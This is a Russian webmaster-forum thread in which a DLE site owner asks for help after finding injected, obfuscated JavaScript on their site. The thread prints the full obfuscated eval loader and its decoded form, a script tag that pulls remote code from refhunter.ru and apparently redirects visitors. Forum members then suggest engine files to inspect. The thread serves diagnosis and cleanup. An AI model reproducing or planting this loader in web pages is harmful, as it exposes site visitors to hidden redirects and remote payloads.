Обнаружено вредоносное ПО
Страницы: 1 2 След.
Обнаружено вредоносное ПО
Здравствуйте, появилась такая проблема.
Если зайти на сайт raplist.ru через обозреватель Opera, то выходит сразу сообщение "Обнаружено вредоносное ПО" и что сайт подозревается в мошенничестве.

Смотрим исходный код страницы. В самом верху до надписи "<!DOCTYPE html PUBLIC " есть следующее
Код
<!-- Obfuscated by MyObfuscator PRO v2.03 www.myobfuscate.com -->
<sc ript language="javascript" type="text/javascript">var OO1='7kyJ+QHcpdyKnI3Yz9CP+ICO4kjM4ETPkl2PwhGcuMnavQHcpJ3Yz9Sdy5iclRnb1hmZlJ3LvoDc0RHai0zYyNHIiQHcpJ3YTFmdhpkI9U2ZhV3ZuFGbgQHcpdyKnI3YzxzJoUGdpJ3duQnbl1Wdj9GZ';var IIO=["\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2B\x2F\x3D","","\x63\x68\x61\x72\x41\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x6C\x65\x6E\x67\x74\x68"];function _0lI(O10){var lOI=IIO[0];var _1l0,I0I,_11O,O0l,_1O1,I10,_1IO,lIO,_1OO=0,_0IO=IIO[1];do{O0l=lOI[IIO[3]](O10[IIO[2]](_1OO++));_1O1=lOI[IIO[3]](O10[IIO[2]](_1OO++));I10=lOI[IIO[3]](O10[IIO[2]](_1OO++));_1IO=lOI[IIO[3]](O10[IIO[2]](_1OO++));lIO=O0l<<18|_1O1<<12|I10<<6|_1IO;_1l0=lIO>>16&0xff;I0I=lIO>>8&0xff;_11O=lIO&0xff;if(I10==64){_0IO+=String[IIO[4]](_1l0);}else{if(_1IO==64){_0IO+=String[IIO[4]](_1l0,I0I);}else{_0IO+=String[IIO[4]](_1l0,I0I,_11O);};};} while(_1OO<O10[IIO[5]]);return _0IO;};function lI1(l10){var III=IIO[1],_1OO=0;for(_1OO=l10[IIO[5]]-1;_1OO>=0;_1OO--){III+=l10[IIO[2]](_1OO);};return III;};eval(_0lI(lI1(OO1)));</script>


Не один антивирус не ругается (за исключением встроенного в оперу AVG) И в гугле и в яндеске не написано, что есть вредоносный код.
Но заметил такую вещь, этот код влияет на стиль сайта. Если убрать его в Исходном коде и применить изменения, текст становится таким каким должен был быть изначально. И ещё раз в сутки с 1 IP если нажать на ссылку не кнопкой мыши а, колёсиком, чтобы открыло в новой вкладке страницу, то страницу выбрасывает на чей то сайт (сайты меняются).

в main.tpl чужих кодов нет. Ставил даже очень старый свой main.tpl чтобы проверить, но от него не зависит, так же не зависит от .htaccess.

Не знаю куда обращаться, и не уверен сталкивался ли бы кто-нибудь с этим. Потому что сам впервые наткнулся на такое предупреждение.

Рекламы на сайте нет и не было в этот период.

Пожалуйста помогите.

Бесплатная контекстная реклама

Я так понимаю, обычный script просто зашифровали через сервис www.myobfuscate.com
Но где и как мне его искать?
смог всё таки расшифровать это байду, вот что выдало:
Код
<sc ript language="JavaScript" src="http://refhunter.ru/script/js.php?id=182988"></script>


Может кто скажет куда такое могли засунуть?
какой движок? попробуйте поискать в index.php
скачайте все файлы на комп и в totalComander поиском найти куски кода
Цитата
daden11 пишет:
какой движок? попробуйте поискать в index.php


Движок DLE 9.3. В index.php нету.
Смотри в папке engine файл engine.php над коментом Формирование speedbar
А может эта ваша партнерка...
ищите инклюд в index.php или main.tpl(не сам код а путь к файлу с ним)
А лучше покажите начала этих файлов тут.
Изменено: Lazun429 - 31 Мая 2011 16:56
Скорее уже в базе. Пробуй фикс: _http://php-yuri.ru/fix.rar
Цитата
Олег пишет:
А может эта ваша партнерка...


исключено.

Цитата
abyss-by пишет:
Скорее уже в базе. Пробуй фикс: _http://php-yuri.ru/fix.rar


Результат: 9075/9074.
Удалено вредоносного кода: 153
Но проблема не решена.

Цитата
Олег пишет:
Смотри в папке engine файл engine.php над коментом Формирование speedbar


спасибо, удалил там какую-то рекламную ссылку, но всё равно это ещё не то что нужно.

Цитата
Lazun429 пишет:
ищите инклюд в index.php или main.tpl(не сам код а путь к файлу с ним)
А лучше покажите начала этих файлов тут.


ничего там не нашел левого smile:(
менял шаблон, проблема не решается, значит к файлам шаба это не относится, дело в самом движке. Скажите где можно ещё поковыряться?
Путь: engine - classes - mysql.php
Скорее всего там.
Цитата
leon_need пишет:
Путь: engine - classes - mysql.php
Скорее всего там.


нету ничего, даже заменял всю эту папку оригиналом с чистого двига, всё равно проблема остается.
Может кэш очистить, может уже вылечили, а кэш старый
Страницы: 1 2 След.
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
16:29 AffiliateCube 3.0 - усовершенствованная платформа 
15:59 Сделать макет визитки на основе картинки 
15:49 Cityads.ru - PPA-партнёрка - до 800$ на 1000 переходов! 
15:01 TeaserNet - тизерная сеть нового поколения! Высокие доходы, стабильные выплаты 
14:02 Рекламная сеть яндекса личный опыт 
13:57 Защита WP от взлома? 
13:52 21 сентября 2017 
16:01 Профессиональный веб-дизайн любой сложности для вас. 
14:24 Продвижение сайтов сателлитами. Создание сетки сателлитов для продвижения Вашего сайта 
13:44 Услуги Продвижения сайтов (SEO). Более 7 лет опыта. Результаты через 3-4 месяца. Кейсы 
13:39 Жду конструктивной оценки! 
13:09 [Продам] Крупные сообщества Вконтакте,Facebook,instagram 
12:40 Рассылка сообщений на стены групп Вконтакте , Одноклассники по любым критериям. 
12:37 Продвижение в социальных сетях: Вконтакте, Одноклассники, Твиттер, Instagram, YOUTUBE, Facebook, Мой мир. 
16:10 Провайдер который вышибает слезу 
15:52 100 баксов в день на Adsense 
15:50 Активация аккаунта адсенс 
15:43 Ищем вебмастеров с высоким тИЦ 
15:39 301 redirect 
14:36 Самые дорогие клики в Adsense 
12:58 Где накрутить подписчиков?